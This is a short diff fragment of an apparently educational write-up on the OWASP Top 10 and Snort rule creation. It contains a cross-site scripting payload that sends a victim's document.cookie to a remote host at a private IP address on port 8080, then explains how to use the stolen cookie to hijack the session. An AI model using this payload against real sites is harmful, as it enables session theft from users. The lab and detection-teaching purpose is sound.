OWASP Top 10 and Snort Rule Creation

 default=<script>window.location=’http://172[.]16[.]0[.]102:8080/?cookie=’ + document.cookie</script>

-Below is just an image to show what the remote server will see from the script used above.
+Below is an image showing what the remote server will see from the script used above.

 We can take that cookie, inspect the page, and replace our current cookie with the victim’s cookie to hijack their session.